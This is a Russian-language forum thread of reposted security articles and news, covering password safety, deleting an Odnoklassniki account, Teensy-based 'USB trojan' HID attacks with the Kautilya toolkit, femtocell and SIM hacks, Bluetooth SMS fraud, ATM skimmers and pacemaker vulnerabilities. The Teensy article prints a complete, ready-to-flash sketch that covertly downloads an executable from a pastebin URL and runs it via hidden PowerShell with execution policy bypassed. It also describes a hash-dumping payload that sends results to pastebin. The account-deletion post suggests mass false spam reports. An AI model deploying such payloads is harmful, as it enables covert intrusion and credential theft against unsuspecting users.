    •Не вводите пароли на чужих компьютерах. Компьютеры в интернет-кафе и лабораториях, системы общего доступа, интерактивные терминалы, а также компьютеры на конференциях и в залах ожидания аэропортов не могут считаться безопасными и подходят только анонимного выхода в Интернет. Не пользуйтесь такими компьютерами для проверки электронной почты, банковского счета, доступа в виртуальные комнаты для разговоров и доступа к другим учетным записям, где запрашивается имя пользователя и пароль.
    Злоумышленники применяют недорогие и быстро устанавливающиеся устройства, записывающие последовательность нажатий на клавиши. Такие устройства позволяют мошенникам получать через Интернет все данные, введенные в компьютер. Помните, что ваши пароли и парольные фразы так же важны, как и данные, которые они защищают.

    Действия в случае хищения пароля

    Отслеживайте все данные, защищенные паролями: финансовые отчеты за месяц, отчеты о кредитных операциях, данные о покупках через Интернет и т. д. Надежные, легко запоминающиеся пароли помогают защититься от мошенничества и хищения идентификационных данных, но не являются абсолютной гарантией защиты. Вне зависимости от того, насколько надежным является пароль, если мошенникам удастся взломать систему, где он хранится, они его узнают. Если вы заметили подозрительные действия, которые могут означать, что кто-то получил доступ к вашим данным, как можно скорее сообщите об этом в соответствующие органы. Дополнительные сведения о действиях в случае хищения идентификационных данных или подобного мошенничества.

    http://bezpekaua.com/informacionnaya...ompyutera.html
    с уважением

  9. #149
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Как безопасно удалиться с Одноклассников.ру?

    Как безопасно удалить свою страничку с Одноклассников?И почему так сложно это сделать?Все просто,чем больше людей зарегистрировано-тем выше рейтинг сайта в интернете.И совсем не важно пользуются люди своей страничкой или нет.Как правило,на самом сайте нет информации о том,как удалить свою страницу.Плюс к этому умершие люди ,данные о которых не известны тоже продолжают оставаться в социальных сетях.Администрация сайта не проводит проверку активности пользователей и соответственно проверить сколько людей не посещают сайт годами невозможно.

    Некоторые пользователи регистрируются несколько раз ,используя различные почтовые ящики.Причин может быть множество-забыли пароль, невозможно зайти на свою страницу, так как происходит сбой, взломали аккаунт и т.д
    Таким образом, на портале может быть несколько десятков тысяч людей «клонов». Однако удалить свои прежние данные крайне сложно, не обладая специальными знаниями.

    Открытость информации также может сыграть с вами злую шутку. Нередки случаи, когда фотографии людей с привлекательной внешностью появлялись на сайтах знакомств, порно-сайтах, порталах, предлагающих людям интим-услуги и т.д. К сожалению, сегодня никто не несет ответственности за распространение личной информации о пользователях социальных сетей по Интернету. Именно поэтому необходимо внимательно следить за тем, какие данные о себе вы оставляете в виртуальном пространстве, а также максимально быстро удалять свой аккаунт с сайтов, если в этом возникла острая необходимость.
    Настройки. Вы удаляете страницу самостоятельно. Для этого заходите в раздел «Моя страница», потом переходите «Редактировать личные данные» и после этого нажимаете подтверждение того, что желаете удалить свой профайл с сайта. После данных действий вам будет предложено указать свой пароль и адрес электронной почты. Через несколько секунд на почту придет письмо с просьбой подтвердить ваше намерение удалить свою страницу с сайта. Стоит отметить, что после данного удаления, вы уже не сможете зарегистрироваться на Одноклассниках с указанного почтового адреса.

    Помощь админов. Обратитесь за помощью к администрации сайта. Для этого вам необходимо связаться с менеджерами и озвучить свой вопрос. Не забывайте о разнице в часовых поясах. Специалисты сайта могут не находиться круглосуточно в сети, поэтому будьте готовы к тому, что ответ придется подождать некоторое время. Это не общение по ICQ, где ответ приходит в считанные секунды, это диалог со специалистом, который в течение одного дня отвечает на огромное количество подобных вопросов. Однако, как показывает практика, очень редко данный вопрос находит ответ. Это связано с тем, что администрации сайта не выгодно терять пользователей социальной сети. Поэтому специалисты могут тянуть время, не давать точных и четких ответов, просить подождать несколько дней для уточнения информации и т.д.

    Активация профайла на друга или знакомого. Порою, возникает достаточно комичная ситуация. Предположим, вы не можете удалить свою страницу с сайта, а ваш знакомый не может пройти регистрацию. В этом случае автор страницы на Одноклассниках удаляет свои личные данные, друзей, фотографии, и отдает страницу знакомому. Тот вносит свои персональные сведения, и пользуется социальной сетью.

    Пустая страница. Некоторые пользователи идут по пути наименьшего сопротивления. Кому будет нужна ваша страница, если на ней не будет абсолютно никаких сведений? Удаляете фотографию, имя, фамилию, организации, личные сведения, друзей. В общем, делаете страницу такой, какая она была после вашей первоначальной регистрации. Теперь закрываете доступ к профайлу для всех кроме друзей. Так как друзей у вас нет (вы их удалили), теперь никто не сможет к вам зайти, так как никаких опознавательных знаков о том, что пустая страницы является вашей, нет.

    Почувствуйте себя программистом. В вашем браузере в конце адресной строки введите следующее: &st.layer.cmd=PopLayerDeleteUserProfile. Тогда появится окно, в котором вам будет предложено ввести свой пароль, и нажать кнопку «Удалить».

    Отказываемся от услуг. Заходим на страницу под своим именем. В самом конце профиля находим раздел «Правила». Заходим туда и ставим галочку напротив раздела «Отказаться от услуг». Вводим пароль от страницы в Одноклассниках. После этого ждем письмо на электронную почту с подтверждением удаления страницы.
    Недавно этот раздел стал называться "Регламент"-там необходимо выбрать-"Отказаться от услуг".

    Хитрость. Всем известно, что страница, с которой рассылается спам, автоматически удаляется модераторами. Попросите знакомых, а те в свою очередь своих знакомых указать на то, что с вашей страницы рассылается спам. После того, как администрации сайта придет несколько десятков предупреждений о том, что от вас идет массовая рассылка, вашу страницу автоматически заблокируют.


    Если вы забыли свой пароль и не можете его восстановить, то для удаления своего аккаунта необходимо написать письмо в администрацию сайта ,где у вас потребуют скан паспорта:

    "Вас приветствует Служба поддержки Odnoklassniki.ru!
    Для удаления акаунта нам необходим скан паспорта, подтверждающий Ваши права на
    эту страницу.""Вас приветствует Служба поддержки Odnoklassniki.ru!
    Для удаления акаунта нам необходим скан паспорта, подтверждающий Ваши права на
    эту страницу."

    http://bezpekaua.com/informacionnaya...ssnikovru.html
    с уважением

  10. #150
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    USB-троян
    //28.01.2013 http://www.xakep.ru/post/60017/
    Зловредные USB-устройства за 24 доллара

    У современных ОС есть интересная особенность — они полностью доверяют устройствам вроде клавиатуры или мыши. Соответственно, если собрать девайс, который будет эмулировать нужный ввод, и подключить его к компьютеру, то можно творить все что угодно. Этим и пользуются злоумышленники.
    WARNING

    Информация представлена исключительно в образовательных целях. Любое ее использование в неправомерных целях может караться по всей строгости закона РФ (статьи 272 и 273 Уголовного кодекса). Ни автор, ни редакция в этом случае ответственности не несут. Думай головой.
    Маленький пример

    Начну с небольшой демонстрации. Представь: специалист по безопасности проводит внутренний пентест в некоторой компании и видит, что один из сотрудников часто оставляет станцию незалоченной. Очевидный путь — подойти и выполнить несколько «злобных» команд, пока этого никто не видит. Однако есть серьезный риск быть пойманным за чужим рабочим местом да еще набирающим что-то непонятное в черном окне консоли . А если бы у исследователя было устройство, которое при подключении само бы набирало заранее запрограммированные команды? Подойти и незаметно вставить такой девайс — уже не слишком большая проблема. Или другой пример. Пусть это будет уже злоумышленник, у которого нет физического доступа к компьютерам. Если замаскировать девайс под видом мышки, флешки или 3G-модема, то есть шанс, что его без лишней помощи вставит кто-то из самих же сотрудников. Известны случаи, когда такие «протрояненные» девайсы отправлялись просто по почте в качестве сувенирки. Процент пользователей, которые, не подозревая о подвохе, подключают устройство к компьютеру, достаточно высок. При этом ни система, ни, к примеру, антивирус не замечают подвоха — для них это обычная клавиатура. Почему так происходит?
    HID-устройства

    Для начала надо разобраться с понятием Human Interface Device, или HID. В Википедии говорится, что HID — тип компьютерного устройства, которое взаимодействует напрямую с человеком, наиболее часто принимает входные данные от человека и предоставляет ему выходные данные. Самые распространенные типы HID-устройств — это клавиатуры, мыши и джойстики. С точки зрения компьютерной системы HID-устройства являются полностью доверенными и в основном рассматриваются как простой интерфейс между пользователем и машиной. Когда ты вставляешь в компьютер новую клавиатуру и мышь, никто у тебя не спрашивает разрешения на их установку, а драйверы чаще всего устанавливаются автоматически. Такое безграничное доверие может выйти боком для пользователя и давно замечено специалистами по информационной безопасности. Еще в 2010 году на хакерской конференции DEFCON небезызвестные Irongeek и Dave ReL1k подробно рассказывали об использовании HID-устройств для проверки безопасности систем. С тех пор в плане защиты не изменилось ровным счетом ничего. И собрать девайс, который под видом клавиатуры будет выполнять запрограммированные действия, ничто не мешает и сейчас, в чем я убедился в рамках моего исследования.
    Плата Teensy

    За основу такого USB-девайса была выбрана плата Teensy++ 2.0. Это программируемый микроконтроллер, который изначально идет вместе с полноценным USB-портом. Среди примеров использования Teensy, в огромном количестве собранных на официальном сайте, — LED-футболка, которая с помощью диодов выводит различные изображения, станок для рисования маркером, наносящим нужный рисунок на любую ровную поверхность, считыватель RFID-карточек, детектор движения и еще десятки полезного и не очень «самопала». Ты наверняка слышал о платах Arduino и ее аналогах, так вот Teensy — очень похожий проект. Но что важно для моей задачи: на Teensy чрезвычайно просто реализовать HID-устройство, которое будет определяться системой как клавиатура или, к примеру, мышь. Поскольку плата изначально снабжена USB-портом, то мне даже не пришлось брать в руки паяльник и выполнять какие-либо хардкорные вмешательства. Все, что было нужно, — написать правильную программу. Замечу, что у платы есть несколько версий, но я выбрал самую навороченную и дорогую — Teensy++ 2.0. Ее можно заказать на официальном сайте проекта pjrc.com всего за 24 доллара.
    Ограничения Teensy

    Есть один нюанс, который сильно усложняет Teensy жизнь. Поскольку мы используем эмуляцию HID-устройства, то мы можем говорить с системой, но не можем ее услышать. Это основное ограничение при написании пэйлоадов для Teensy, которое делает пэйлоады менее чувствительными к состоянию системы. Разработчику боевых нагрузок придется заранее определить все возможные ситуации и реакцию системы, потому что во время выполнения прочитать ответ системы будет невозможно. Единственная вещь, которую Teensy может считать, когда используется в качестве клавиатуры, — это состояние кнопок CAPS, NUM и SCROLL. Еще одним ограничением является маленький размер памяти устройства, но с этим можно жить, особенно если подключить к Teensy дополнительный носитель данных, например SD-карту.
    Hello world для железки

    Teensy, как и платы Arduino, использует похожий процессор Atmel AVR, поэтому можно взять ту же среду разработки — Arduino Development Environment (arduino.cc), ее также называют ADE. Последняя бесплатно доступна для всех популярных ОС (Windows, Linux, Mac OS X) и, помимо редактирования кода, позволяет залить программу в микроконтроллер. Чтобы полноценно использовать ее для работы с Teensy, необходимо также установить дополнительный аддон Teensyduino (pjrc.com/teensy/teensyduino.html). Надстройка, в частности, сразу предоставляет возможность перевести Teensy в режим эмуляции клавиатуры: это делается в ADE через меню «Tools --> Boards --> USB Keyboard». Если вставить девайс в компьютер, то он сразу определится как клава. Однако происходить ничего не будет — пока ничего не запрограммировано.
    Что представляет собой программа или, как ее называют в здешней терминологии, скетч для Teensy? Разработка осуществляется с помощью С-подобного синтаксиса. Программисту доступны переменные, методы, условные операторы, указатели — короче говоря, все, что нужно для счастья. Любой скетч должен содержать функции setup() и loop(): первая вызывается один раз во время запуска, а вторая в цикле выполняет написанный внутри нее код. Функции могут быть даже пустыми, однако присутствовать должны — иначе компиляция будет завершаться неудачей. Приведу пример простейшего кода:
    int count = 0;
    void setup() { }
    void loop() {
    Keyboard.print("Hello World ");
    delay(5000);
    }

    Как видишь, для эмуляции ввода используется уже готовая функция Keyboard.print(). Причем ввод будет повторяться, потому что вызов осуществляется из функции loop(). Задержка, реализованная с помощью delay(), нужна для того, чтобы повторение ввода не происходило слишком быстро. В документации подробнейшим образом описываются более сложные случаи эмуляции и клавиатуры, и мышки, и джойстика — я же на этом описание программирования Teensy закончу. В ходе своего исследования я уже создал все необходимые скетчи, которые могут понадобиться пентестеру, и оформил их в виде готового набора инструментов Kautilya (code.google.com/p/kautilya), который доступен с открытыми исходниками всем желающим.
    Тулкит Kautilya

    В ходе лекций о Teensy я заметил, что очень часто у пентестеров банально не хватает времени для программирования микроконтроллера под свои нужды. В результате они просто отказываются от этого инструмента. Я решил максимально упростить задачу и написал на Ruby скрипт, спрашивающий некоторые параметры и на выходе выдающий готовый скетч, который можно загрузить в Teensy. Благодаря этому снабдить микроконтроллер боевой нагрузкой можно вообще без знания о том, как пишутся программы для микроконтроллера.


    Управление тулкитом Kautilya осуществляется через консольное меню

    Чтобы лучше понимать, что зашито внутри Kautilya, предлагаю рассмотреть, как бы выглядел пентест Windows 7 машины с помощью HID-устройства, если бы необходимо было начинать с нуля. Скорее всего, это были бы следующие этапы:

    1. Распознать операционную систему с точки зрения USB-буфера.
    2. Выяснить поддерживаемые команды и научиться с их помощью реализовывать нужные нам действия в системе с помощью PowerShell- и/или VBS-скриптов.
    3. Определить встроенные механизмы безопасности (такие как UAC и политика запуска PowerShell-скриптов), которые могут проверять привилегированные команды, и затем найти способ их обходить.
    4. Узнать время, затрачиваемое ОС на выполнение различных команд.
    5. Записать команды и скрипты на плату Teensy.
    6. Узнать, какие фокусы может выкинуть командная строка, когда Teensy будет передавать команды (эмулировать ввод с клавиатуры) на машину жертвы.
    7. Постараться быть как можно незаметней на компьютере жертвы.
    8. Протестировать пэйлоад и сделать окончательный скетч.
    9. Скомпилировать скетч и залить на Teensy.
    10. Присоединить девайс к машине жертвы или сделать так, чтобы она сделала это сама (например, с помощью социальной инженерии).
    11. Получить результат .

    INFO

    Автор этой статьи живет в Индии, а тулкит Kautilya назван в честь индийского стратега, экономиста и политолога Чанакья (Каутилья — один из его псевдонимов).

    Следующие несколько строк могут выглядеть как самореклама . Kautilya автоматизирует шаги с первого по восьмой. Другими словами, с использованием тулкита исследователю достаточно:

    1. Выбрать через консольное меню Kautilya готовую боевую нагрузку и указать опции — в результате будет сгенерирован готовый скетч (*.ino или *.pde файл).
    2. Залить скетч на плату Teensy.
    3. Присоединить девайс к машине-жертве.
    4. Наслаждаться победой!

    В настоящий момент тулкит содержит в себе пэйлоады для Windows 7 и Linux (протестирован на Ubuntu 11.4). Чтобы не быть голословным, предлагаю изучить некоторые из них и посмотреть, как они работают, если на машине жертвы используется Windows 7.


    Создаем скетч для дампа пользовательских паролей
    Есть ли способ защититься?

    Я вижу два основных способа защиты от подобных атак на Windows-системах:

    1. Запретить установку съемных устройств — это можно сделать с помощью групповой политики безопасности (gpedit.msc) как для локальной машины, так и для рабочих станций в домене. Если перейти в «Административные шаблоны --> Система --> Установка устройства --> Ограничения на установку устройств», то ты увидишь различные настройки для ограничения установки устройств. Я бы рекомендовал включить опцию «Запретить установку съемных устройств», после этого ни одно устройство подключить к системе будет уже нельзя. Кроме того, запрещено будет и обновление драйверов для уже установленных устройств. Установить новое устройство сможет только администратор, да и то только после активации опции «Разрешить администраторам заменять политики ограничения установки устройств». Имей в виду: если речь идет об организации, то это непременно обернется кошмаром для пользователей, которые, не обнаружив привычный Plug'n'Play, сразу же замучают админа просьбами посмотреть их компьютер. А что делать?
    2. Поступить радикально и запретить физический доступ к USB-портам. К сожалению, чаще всего это не представляется возможным — в большой компании всегда останется лазейка. Некоторые производители материнских плат заявляют, что их защитные решения умеют блокировать подобные зловредные устройства (в том числе собранные на базе Teensy). Но я бы рекомендовал не сильно доверять подобным заявлениям: проверял я тут одну защиту, и она была бесполезна чуть больше чем полностью.


    Запрещаем установку внешних устройств для предотвращения атак через USB-устройства
    Примеры использования

    Payload: скачать и выполнить

    Как я уже говорил, боевая нагрузка выбирается через консольное меню Kautilya. Один из простых пэйлоадов — Download and Execute, который загружает файл из интернета и запускает его на целевой системе. Естественно, при создании программы для микроконтроллера необходимо указать, откуда этот файл нужно взять. Интересно, что для хостинга бинарника предлагается разместить его на сервисе Pastebin.com, предварительно обработав его для хранения в текстовом виде, а для соответствующей конвертации пригодится специальный скрипт exetotext.ps1, который лежит в папке Kautilya/extras. В момент выполнения на машине-жертве программа скачивает текстовый файл, преобразует его обратно в исполняемый exe’шник и выполняет его в фоновом режиме. Это может быть windows reverse meterpreter (по сути, реверс-шелл): если подключить девайс с таким скетчем к исследуемому компьютеру, то пентестер очень скоро получит meterpreter-сессию. Причем нагрузка умеет обходить execution policy и не отображает никаких окон на целевом компьютере.

    Интересно рассмотреть, что все-таки генерирует Kautilya. Приведу ниже скрипт, поясняя важные моменты небольшими комментариями:

    void setup() {
    delay(5000);
    // Задержка в 5 секунд необходима, чтобы Windows 7 подготовилась для работы с устройством

    run("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"");
    // Открываем окно консоли очень маленького размера с заголовком Installing Drivers

    delay(3000);

    Keyboard.println("echo $webclient = New-Object System.Net.WebClient > %temp%\\download.ps1");
    // Создаем объект класса WebClient

    Keyboard.println("echo $url = \"http://pastebin.com/raw.php?i=NfiBdUp9\" >> %temp%\\download.ps1");
    // Pastebin URL в raw-формате, который был передан в качестве опции Katuilya

    Keyboard.println("echo [string]$hex = $webClient.DownloadString($url) >> %temp%\\download.ps1");
    // Загружаем текст в hex-формате

    Keyboard.println("echo [Byte[]] $temp = $hex -split ' ' >> %temp%\\download.ps1");
    // Переводим hex в bytes

    Keyboard.println("echo [System.IO.File]::WriteAllBytes(\"%TEMP%\\payload.exe\", $temp) >> %temp%\\download.ps1");
    // Записываем полученные байты в exe-файл

    Keyboard.println("echo start-process -nonewwindow \"%TEMP%\\payload.exe\" >> %temp%\\download.ps1");
    // Незаметно выполняем payload.exe

    delay(2000);

    Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\download.vbs");

    Keyboard.println("echo oShell.Run(\"powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\\download.ps1\"),0,true >> %temp%\\download.vbs");
    // Выполняем PowerShell-скрипт из vbs, который обходит execution policy и не отображает никаких окон на компьютере-жертве

    delay(1000);

    Keyboard.println("wscript %temp%\\download.vbs");

    delay(3000);

    Keyboard.println("exit");
    // Закрываем окно терминала
    }

    void loop(){
    // loop-функция необходима в скетче
    }

    void run(char *SomeCommand){
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    // Эмулируем нажатие клавиши Windows

    Keyboard.set_key1(KEY_R);
    // Эмулируем нажатие клавиши

    Keyboard.send_now();
    // Посылаем комбинацию клавиш +, которая открывает окно "Выполнить"

    delay(1500);
    Keyboard.set_modifier(0);
    // Эмулируем отпускание клавиши

    Keyboard.set_key1(0);
    // Эмулируем отпускание клавиши

    Keyboard.send_now();
    // Отпускаем и

    Keyboard.print(SomeCommand);
    // Вводим переданный аргумент SomeCommand в окне "Выполнить"
    Keyboard.set_key1(KEY_ENTER);

    Keyboard.send_now();

    Keyboard.set_key1(0);

    Keyboard.send_now();
    }

    Еще раз поясню: этот сгенерированный скрипт сразу готов для загрузки на Teensy через среду разработки Arduino Development Environment.

    Payload: сдампить хеши паролей

    Другой пэйлоад может быть использован для дампа хешей паролей с Windows 7 машины. Для того чтобы его применить, исследователю необходимо предварительно загрузить скрипт powerdump meterpreter из метасплойта на Pastebin, откуда он будет впоследствии загружен на жертву. Как известно, этот скрипт работает только с привилегиями SYSTEM, которые можно получить, если добавить задание в стандартный планировщик задач. Однако этот старый добрый трюк сработает только из-под аккаунта администратора. Чтобы передать полученные данные, скетч опять же использует сервис Pastebin, но не раскрывает хеши для всех подряд — вместо этого он публикует их в виде приватного поста (недоступен для посторонних). Правда, для этого предварительно нужно зарегистрироваться в сервисе и получить свой ключ разработчика (api developer key), который скетч будет использовать для публикации данных. Логин/пароль и ключ для Pastebin, а также имя задачи планировщика — все это, само собой, запросит Kautilya при создании программы для Teensy. Если залить полученный скетч и вставить в компьютер пользователя, который работает с правами администратора, то на Pastebin.com очень скоро окажутся хеши пользовательских паролей, которые часто брутятся.
    с уважением

  11. #151
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Взлом фемтосот для прослушивания абонентов сотовой сети
    http://www.xakep.ru/post/60930/default.asp
    Специалисты по безопасности из компании iSEC Partners сумели взломать популярные в США фемтосоты от оператора сотовой связи Verizon. С помощью этих устройств осуществляется усиление сигнала сотовой связи внутри помещений, но хакеры могут использовать их для перехвата чужих коммуникаций.

    Эта новость особенно забавно выглядит именно сейчас, когда оператор Verizon находится в центре скандала из-за передачи метаданных о звонках всех своих абонентов в АНБ. Оказывается, прослушивать пользователей могут не только спецслужбы.

    Более подробно о методах взлома фемтоcот для сотовой связи исследователи расскажут на хакерской конференции Black Hat, которая начнется 27 июля в Лас-Вегасе. Официальное описание уязвимости с получением рутового доступа через прерывание SysReq см. здесь (требуется физический доступ к фемтосоте для подключения кабеля).
    verizon.jpg
    Verizon Wireless Network Extender SCS-26UC4

    Компания Verizon уведомлена об уязвимости и уже выпустила новые версии прошивок для моделей Verizon Wireless Network Extender SCS-26UC4 и SCS-2U01, обе производства Samsung. Однако, авторы работы говорят, что аналогичная уязвимость может присутствовать приблизительно в 30 моделях фемтосот других производителей.
    с уважением

  12. #152
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Газель + Bluetooth = развод через SMS


    В центре мониторинга одного из операторов сотовой связи обнаружили странную активность. Клиенты из одного и того же места в городе неожиданно начали отправлять SMS на некоторый платный номер. Сложно объяснимая ситуация оказалась примером изящного мошенничества, от которого пострадали тысячи людей.


    Итак, как это было сделано?

    Шаг 1

    В людном месте была припаркована газель с несколькими антеннами на крыше. Сканируя эфир Bluetooth, специальный ноутбук отправлял запрос на установку связи (pairing) всем обнаруженным устройствам. Ничего не подозревая, люди часто соглашались принять подключение.

    Шаг 2

    С помощью установленного соединения злоумышленники передавали на телефоны жертв последовательность AT-команд, отправляющую SMS-сообщения на платный номер. Чтобы не потерять связь, использовались мощные Bluetooth-антенны.

    Шаг 3

    Платный номер был арендован злоумышленниками для вывода денег через подставных лиц. Номер намеренно был выбран максимально «дешевым», чтобы жертвы не обращали внимание на небольшое изменение своего баланса.

    Шаг 4

    Для удаленного управления ноутбуками, с помощью которых проводилась атака, злоумышленники использовали TeamViewer. В газели находились лишь мало что понимающие исполнитель и водитель. Они были арестованы. Организатор схемы пока на свободе
    с уважением

  13. #153
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Уязвимость в сим-картах позволяет украсть "цифровую личность"
    РИА "Новости"
    Найдена уязвимость в безопасности некоторых SIM-карт, дающая возможность установить сторонний контроль над мобильным телефоном, сообщает издание The New York Times.



    Основатель Security Research Labs Карстен Нол (Karsten Nohl) заявил, что технология шифрования, которая применяется в некоторых SIM-картах, имеет серьезную уязвимость. "Дыра" в безопасности позволяет злоумышленникам получить 56-значный цифровой ключ доступа к чипу устройства, зная который, можно заразить мобильный телефон вирусом, послав его в простом текстовом сообщении.

    В качестве эксперимента Карстен Нол таким способом получил управление мобильным телефоном "жертвы" и смог совершать от ее имени покупки посредством платежных систем. Вся операция заняла у "взломщика" не более двух минут, при этом использовался обычный персональный компьютер.

    Прослушивать разговоры, читать переписку, скопировать всю информацию с SIM-карты, полностью украсть "цифровую личность" владельца телефона — все это можно сделать, имея в своем распоряжении упомянутый цифровой ключ. По оценке эксперта, подобного рода атакам рискуют подвергнуться порядка 750 миллионов устройств по всему миру.

    Карстен Нол не сообщил, SIM-карты каких операторов наиболее уязвимы для взлома. По его словам, данная информация не будет озвучена и на конференции Black Hat, посвященной вопросам безопасности, которая пройдет в августе. Сравнительный анализ защиты различных SIM-карт можно ожидать в декабре 2013 года, в рамках хакерской конференции Chaos Communication Congress в Гамбурге.
    \\

    на самом деле всё зависит от партии СИМ-карт , в частности - от особенностей их архитектуры и версий прошивки, тот или иной способ взлома будет заточен под известные потенциальные дыры в протоколе безопасности.



    в очередной раз убеждаемся в ничтожности электронных оков, опутавших мир
    с уважением

  14. #154
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0



    время воров с ломами и кувалдами уходит
    с уважением

  15. #155
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    В Чувашии задержаны подозреваемые в совершении мошенничества с использованием электронно-считывающего устройства
    25 Июля 17:31
    В июле в Чебоксарах в терминале одного из банков двое мужчин установили считывающий аппарат - скиммер. С помощью устройства они получили информацию о персональных данных и пин-кодах электронных карт оплаты граждан. Об этом стало известно службе безопасности банка, сотрудники которой обратились в полицию. Камера видеонаблюдения, установленная в помещении банкомата, четко зафиксировала лица злоумышленников.
    В течение нескольких дней сотрудники управления уголовного розыска и отдела «К» МВД республики установили преступную схему, по которой действовали злоумышленники.
    Бойцы полицейского спецназа задержали мужчин в тот момент, когда они сняли с банкомата скиммер и вернулись к машине.
    Сейчас установлено, что оба злоумышленника – им по 48 лет – являются уроженцами Молдовы, проживают в Москве. Один из них был судим за разбойное нападение.
    В ходе задержания у них были изъяты - скиммер, три флэш-карты и два сотовых телефона.
    В отношении злоумышленников по факту мошенничества возбуждено уголовное дело. Полицейские не исключают их причастность к совершению аналогичных преступлений на территории других регионов страны.
    Пресс-служба МВД по Чувашской Республике
    с уважением

  16. #156
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Хакер, нашедший "дыру" в кардиостимуляторах, умер при таинственных обстоятельствах за неделю до выступления
    Сергей Попсулин, CNews
    Бэрнеби Джек (Barnaby Jack), известный хакер, программист и специалист по информационной безопасности, умер в минувший четверг в Сан-Франциско в возрасте 35 лет при неизвестных обстоятельствах, сообщает Reuters.

    Джек скончался за несколько дней до своего выступления на конференции Black Hat в Лас-Вегасе, которое должно было состояться 1 августа.

    Здесь он планировал выступить с докладом об уязвимостях в кардиостимуляторах, которые позволяют дистанционно, по беспроводной связи на расстоянии около 9 метров, подать в кардиостимулятор команду, которая пошлет на сердце разряд в 830 вольт и убьет пациента.

    Джек также нашел способ перепрограммирования кардиостимулятора так, чтобы смерть наступила спустя заданное время.

    Кроме того, он предположил, что с помощью встроенного модуля беспроводной связи такое устройство могло бы "заражать" кардиостимуляторы других людей в радиусе действия и, таким образом, вызывать смертельную эпидемию. Свои находки Джек впервые представил на хакерской конференции BreakPoint в Мельбурне в октябре 2012 года.

    Хакер не сообщил название производителя, в кардиостимуляторах которого он обнаружил уязвимости. Недавно в интервью Reuters Джек заявил, что работает с этой компанией над повышением безопасности ее медицинских устройств.

    В 2011 г. на конференции RSA Security Conference Джек продемонстировал способ взлома инсулиновой помпы, которая автоматически вводит препарат в организм пациента при лечении сахарного диабета. Он обнаружил уязвимость, которая позволяет управлять электронным устройством на расстоянии около 90 м и вводить с его помощью в организм пациента смертельную дозу препарата.

    Уязвимость была обнаружена в устройствах компании Medtronic. Позже Medtronic была вынуждена нанять сторонних специалистов для оценки безопасности своих продуктов.

    Бэрнеби Джек стал широко известен в 2010 г. после доклада об уязвимостях в банкоматах, которые позволяют снимать всю имеющуюся наличность. Позже разработчики программного обеспечения для банкоматов устранили эти уязвимости.

    Перед смертью Джек работал специалистом по безопасности в компании IOActive. Многие люди, которые его знали, высказали в интернете слова сочувствия в связи с его уходом из жизни, отметив, что он был хорошим человеком.

    В блогосфере отмечают, что смерть Джека является не первой неожиданной и необъяснимой смертью американского гражданина с начала года. В январе 2013 года был найден мертвым в Нью-Йорке Аарон Шварц, интернет-активист, который выступал за свободное распространение информации, в том числе об американском правительстве. Официально причиной смерти 26-летнего Шварца было названо самоубийство.
    с уважением

  17. #157
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    "Белтелеком" внедрил защиту от телефонных мошенников, подменявших номера при заграничных звонках
    Читать полностью: http://it.tut.by/359430


    Время от времени белорусы сталкивались с необычным явлением: звонки из-за границы (от зарубежных абонентов и от белорусов в роуминге) поступали не со знакомых номеров, а с "подставных" с белорусским кодом +375хх. Компания "Белтелеком" сообщила 29 июля о внедрении эффективного средства по борьбе с мошенничеством, симптомом которого является такая подмена номера.

    В июне 2013 года РУП "Белтелеком" запустил антифродовую систему на базе оборудования и программного обеспечения компании "cVidya" (Израиль). Данная система позволяет, в частности, бороться и с таким видом мошенничества, как незаконная IP-телефония.

    "Белтелеком" предупреждает: если при поступлении звонков из-за границы отображается незнакомый белорусский номер или вообще отсутствует информация о входящем звонке, а качество соединения – неудовлетворительное, абонент сталкивается с незаконной терминацией телефонного голосового трафика.

    В данном случае соединения проходят через сеть Интернет, а затем переводятся в телефонную сеть общего пользования. При этом используется специальное оборудование, так называемые "голосовые шлюзы". Они позволяют вывести телефонный разговор в сеть Интернет, передать его на расстояние и принять в любой точке телефонной сети.

    Отличительными особенностями оборудования является возможность выявления мошеннических операций в режиме реального времени за счет использования данных на уровне обмена сигнальной информацией между АТС. Закупленное программное обеспечение позволяет проводить анализ поведения абонента в течение различного периода времени.

    Данные о неправомерном использовании сервисов и услуг, полученные от антифродовой системы, передаются правоохранительным органам для принятия мер административной и уголовной ответственности.
    Читать полностью: http://it.tut.by/359430
    с уважением

  18. #158
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    http://www.3dnews.ru/658201
    Сигнал мобильного телефона является уникальным идентификатором

    06.08.2013 [15:00], Константин Ходаковский
    Исследователи Дрезденского технического университета разработали удивительно надёжный метод отслеживания, который в состоянии удалённо идентифицировать отдельные GSM-аппараты на основе уникальных характеристик их радиосигналов, даже если идентификационные коды телефона или SIM-карты были сознательно изменены.
    В лабораторных тестах, приближенных к реальным условиям, исследователи могли идентифицировать 13 отдельных мобильных телефонов с очень высокой долей вероятности — 97,62% случаев. Это весьма впечатляющий первоначальный результат, причём команда разработчиков уверяет, что это лишь первый шаг на пути этого типа удалённой идентификации устройств.
